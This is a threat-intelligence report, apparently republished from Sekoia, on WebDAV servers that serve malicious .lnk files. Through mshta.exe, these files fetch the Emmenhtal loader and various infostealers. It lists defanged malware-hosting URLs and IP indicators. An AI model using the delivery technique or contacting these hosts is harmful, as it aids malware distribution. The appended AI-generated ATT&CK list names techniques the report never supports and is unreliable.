WebDAV-as-a-Service: Exploring the Infrastructure of Emmenhtal Loader Distribution

Short Summary:

This report discusses the ongoing monitoring of the Emmenhtal loader, a stealthy malware loader used for distributing various infostealers. The analysis highlights the use of WebDAV technology for hosting malicious files, the diverse range of malware delivered, and the potential for this infrastructure to be offered as a service to multiple threat actors.

Key Points:

• The Emmenhtal loader, also known as PeakLight, operates in a memory-only manner, making it difficult to detect.
• WebDAV technology is utilized to host malicious files, facilitating the distribution of the Emmenhtal loader.
• Malicious “.lnk” files are used to trigger downloads of the loader via the legitimate “mshta.exe” binary.
• A wide variety of malware families, including SelfAU3, DarkGate, and Amadey, have been identified in the infrastructure.
• The infrastructure may be part of a broader “Infrastructure-as-a-Service” (IaaS) model for cybercriminals.
• Consistent use of specific Autonomous Systems (AS) suggests a reliable hosting arrangement for the malware distribution.
• The report emphasizes the need for ongoing vigilance and defensive measures against this evolving threat.

MITRE ATT&CK TTPs – created by AI

• Execution – T1203
  • Exploitation of vulnerabilities in software to execute malicious code.
• Command and Control – T1071
  • Use of application layer protocols for command and control communication.
• Persistence – T1053
  • Scheduled task/cron job to maintain persistence.
• Credential Access – T1003
  • Credential dumping to obtain user credentials.
• Exfiltration – T1041
  • Exfiltration over command and control channel.

This report was originally published for our customers on 30 August 2024.

Introduction

Since December 2023, Sekoia TDR team monitored a specific infrastructure involved in the distribution of the Emmenhtal loader. Emmenhtal is a stealthy malware loader known for its effectiveness in distributing various commodity infostealers worldwide. This loader has attracted attention from cybersecurity researchers, with detailed analyses provided by Orange Cyberdefense and Google Cloud’s Threat Intelligence team.

The Emmenhtal loader, also known as PeakLight, operates in a memory-only manner, making it difficult to detect and analyse. It is primarily used to distribute other malicious payloads, including well-known infostealers that target sensitive information.

This blogpost begins by examining the use of WebDAV technology in hosting malicious files related to the Emmenhtal loader, then analyses the various final payloads delivered through this infrastructure, and concludes by exploring the possibility that the infrastructure is being offered as-a-service to multiple threat actors.

Use of WebDAV technology for malicious file hosting

In our investigation of the infrastructure distributing the Emmenhtal loader, TDR analysts identified the use of WebDAV (Web Distributed Authoring and Versioning) technology to host malicious files. WebDAV, an extension of the HTTP protocol, allows for the management of files on web servers, including uploading, editing, and deleting files remotely. Even though WebDAV has legitimate applications in collaborative environments, threat actors have increasingly leveraged this technology to facilitate malicious activities.

The Emmenhtal loader, first detailed by Orange Cyberdefense for its role in distributing commodity infostealers, was later analysed by Google Cloud’s Threat Intelligence team, which uncovered its sophisticated memory-only execution strategy under the name PeakLight. These analyses underscore the significant and evolving threat posed by Emmenhtal as it continues to deliver new infostealers.

In one of the infection chains described by Orange Cyberdefense and Google, the user is initially redirected to the WebDAV server through a drive-by compromise while visiting some websites. This process results in a preview of an explorer.exe window connected to the WebDAV server, where the malicious files are hosted. Since the end of 2023, Sekoia.io identified more than 100 malicious WebDAV servers from this infrastructure.

In the infrastructure Sekoia analysed, the malicious files were hosted within the “/Downloads” directory on a WebDAV server, an open directory where all files are accessible. The files predominantly consisted of “.lnk” files, which were weaponised to download further malicious payloads using the “mshta.exe” binary, a legitimate Microsoft executable designed to execute Microsoft HTML Application (HTA) files.

The use of “mshta.exe” to download and execute malicious payloads is a known technique among cybercriminals. By utilising a trusted system binary like “mshta.exe”, threat actors can bypass certain security controls and achieve a higher degree of stealth in their operations. Once the “.lnk” file is executed, “mshta.exe” is invoked to retrieve the Emmenhtal loader, which is most often hosted on separate infrastructure, adding complexity to the attack chain.

This method of using WebDAV to host malicious “.lnk” files that trigger the download of Emmenhtal via “mshta.exe” represents an evasive tactic. The separation of the hosting server for the initial “.lnk” files and the payload server hinder detection and attribution efforts, making it a preferred strategy among advanced threat actors.

Detailed analysis of malware delivered via WebDAV

Our analysis uncovered a wider range of malware distributed via this infrastructure than previously reported. The malware families identified, such as SelfAU3, DarkGate, and Amadey, demonstrate the infrastructure’s versatility. Each payload was identified as being delivered through WebDAV-hosted “.lnk” files, with the malicious URLs adjusted to avoid direct exposure. Below is a table of the identified malware families and the corresponding URLs:

91[.]92[.]251[.]35/Downloads/solaris-docs[.]lnk

206[.]188[.]196[.]28/Downloads/example[.]lnk

147[.]45[.]79[.]82/Downloads/qqeng[.]pdf[.]lnk

91[.]92[.]243[.]198:81/Downloads/test[.]lnk

89[.]23[.]107[.]244/Downloads/Test[.]lnk

94[.]156[.]64[.]74/Downloads/SecretTeachings[.]pdf[.]lnk

151[.]236[.]17[.]180/Wire%20Confirmation/WireConfirmation[.]pdf[.]lnk

62[.]133[.]61[.]104/Downloads/test[.]pdf[.]lnk

62[.]133[.]61[.]101/Downloads/Invoice[.]pdf[.]lnk

62[.]133[.]61[.]37/Downloads/config[.]txt[.]lnk

89[.]23[.]103[.]56/Downloads/Videof/Full%20Video%20HD%20%281080p%29[.]lnk

62[.]133[.]61[.]73/Downloads/Photo[.]lnk

147[.]45[.]50[.]214/Downloads/demo[.]pdf[.]lnk

92[.]118[.]112[.]253/Downloads/releaseform[.]pdf[.]lnk

89[.]23[.]107[.]67/Downloads/2023-Documents%20Shared[.]lnk

147[.]45[.]50[.]57/Downloads/INVOICE%20340138551[.]pdf[.]lnk

The discovery of these additional malware families highlights the evolving nature of the threat landscape associated with the Emmenhtal loader.

Infrastructure assumptions and observations

Based on our analysis and the diversity of malware observed, it is plausible that the WebDAV infrastructure described above is part of a broader cybercriminal operation offering “Infrastructure-as-a-Service” (IaaS) to other threat actors. This hypothesis is supported by several key observations:

1. Diversity of final payloads: The wide range of malware families delivered through this infrastructure suggests that multiple threat actors are utilising the same service. The distribution of various malware, such as SelfAU3, DarkGate, and Amadey, among others, indicates a shared infrastructure being rented or leased to different cybercriminals with varying objectives.
2. Presence of test files: Since December 2023, we have consistently observed the presence of “test” files within the infrastructure. These files likely represent attempts by clients to validate the reliability and effectiveness of the service before deploying their actual payloads. The use of test files is common in IaaS models, where customers wish to ensure the functionality of the infrastructure they are purchasing.
3. Consistency in autonomous systems (AS): There has been a notable consistency in the Autonomous Systems (AS) used to host the WebDAV servers associated with this infrastructure. This consistency further supports the theory of a centralised service being offered. Below is a list of the AS providers and the approximate date they were first observed:
   • Terasyst Ltd (AS31420): Observed from February 2024
   • Zonata – Natskovi & Sie Ltd. (AS34368): Observed from February 2024
   • BL Networks (AS399629): Observed from February 2024
   • ICDSoft Ltd. (AS8739): Observed from March 2024
   • OOO Freenet Group (AS2895): Observed from April 2024
   • Perviy TSOD LLC (AS48430): Observed from April 2024
   • GLOBAL INTERNET SOLUTIONS LLC (AS207713): Observed from May 2024

The repeated use of specific AS providers over several months suggests that the threat actor(s) behind this infrastructure have established a reliable hosting arrangement, potentially as part of a larger IaaS offering. This consistency in hosting environments might also be indicative of a deliberate choice to evade detection by rotating among a select group of trusted providers.

Conclusion

The findings presented in this report suggest that the infrastructure used to distribute the Emmenhtal loader is likely part of a commercial service offered by a cybercriminal group. The presence of multiple malware payloads, consistent testing activities, and the reuse of specific Autonomous Systems for hosting all point towards a sophisticated operation designed to cater to multiple clients. As this infrastructure continues to evolve, it poses a significant and ongoing threat, necessitating continued vigilance and targeted defensive measures by cybersecurity professionals.

Our clients can access detailed information on the observed activities, related threat indicators, and ongoing monitoring efforts directly through our platform. We remain committed to tracking this infrastructure over time and will provide continuous updates as new developments emerge.

IOCs

104[.]131[.]7[.]207
141[.]98[.]234[.]166
147[.]45[.]178[.]54
147[.]45[.]50[.]142
147[.]45[.]50[.]144
147[.]45[.]50[.]172
147[.]45[.]50[.]214
147[.]45[.]50[.]23
147[.]45[.]50[.]26
147[.]45[.]50[.]34
147[.]45[.]50[.]57
147[.]45[.]50[.]86
147[.]45[.]79[.]82
151[.]236[.]17[.]180
168[.]100[.]9[.]199
178[.]209[.]51[.]222
185[.]143[.]223[.]188
185[.]196[.]8[.]158
191[.]243[.]196[.]114
193[.]124[.]33[.]71
193[.]233[.]75[.]13
194[.]190[.]152[.]108
194[.]87[.]252[.]22
200[.]150[.]194[.]109
206[.]188[.]196[.]28
212[.]18[.]104[.]111
45[.]151[.]62[.]238
46[.]29[.]234[.]129
62[.]133[.]61[.]101
62[.]133[.]61[.]104
62[.]133[.]61[.]106
62[.]133[.]61[.]148
62[.]133[.]61[.]155
62[.]133[.]61[.]168
62[.]133[.]61[.]189
62[.]133[.]61[.]207
62[.]133[.]61[.]240
62[.]133[.]61[.]26
62[.]133[.]61[.]37
62[.]133[.]61[.]43
62[.]133[.]61[.]49
62[.]133[.]61[.]56
62[.]133[.]61[.]69
62[.]133[.]61[.]73
62[.]133[.]61[.]79
62[.]133[.]61[.]90
62[.]133[.]61[.]97
62[.]133[.]61[.]98
78[.]153[.]139[.]202
79[.]137[.]203[.]158
82[.]115[.]223[.]234
84[.]247[.]187[.]231
89[.]110[.]78[.]58

89[.]23[.]103[.]118
89[.]23[.]103[.]123
89[.]23[.]103[.]15
89[.]23[.]103[.]188
89[.]23[.]103[.]205
89[.]23[.]103[.]253
89[.]23[.]103[.]56
89[.]23[.]103[.]57
89[.]23[.]103[.]8
89[.]23[.]103[.]97
89[.]23[.]107[.]113
89[.]23[.]107[.]123
89[.]23[.]107[.]168
89[.]23[.]107[.]181
89[.]23[.]107[.]240
89[.]23[.]107[.]244
89[.]23[.]107[.]251
89[.]23[.]107[.]67
89[.]23[.]113[.]140
91[.]202[.]233[.]136
91[.]92[.]240[.]234
91[.]92[.]240[.]247
91[.]92[.]240[.]29
91[.]92[.]243[.]198
91[.]92[.]243[.]74
91[.]92[.]245[.]185
91[.]92[.]245[.]222
91[.]92[.]246[.]102
91[.]92[.]248[.]129
91[.]92[.]248[.]50
91[.]92[.]248[.]77
91[.]92[.]248[.]90
91[.]92[.]250[.]123
91[.]92[.]250[.]150
91[.]92[.]250[.]44
91[.]92[.]251[.]35
91[.]92[.]253[.]126
91[.]92[.]254[.]167
91[.]92[.]254[.]225
92[.]118[.]112[.]223
92[.]118[.]112[.]253
94[.]131[.]112[.]206
94[.]156[.]64[.]74
94[.]156[.]64[.]76
94[.]156[.]65[.]126
94[.]156[.]65[.]130
94[.]156[.]69[.]111
94[.]156[.]69[.]6
94[.]156[.]8[.]31
95[.]164[.]68[.]24
95[.]216[.]196[.]85

Feel free to read other Sekoia.io TDR (Threat Detection & Research) analysis here :

Source: Original Post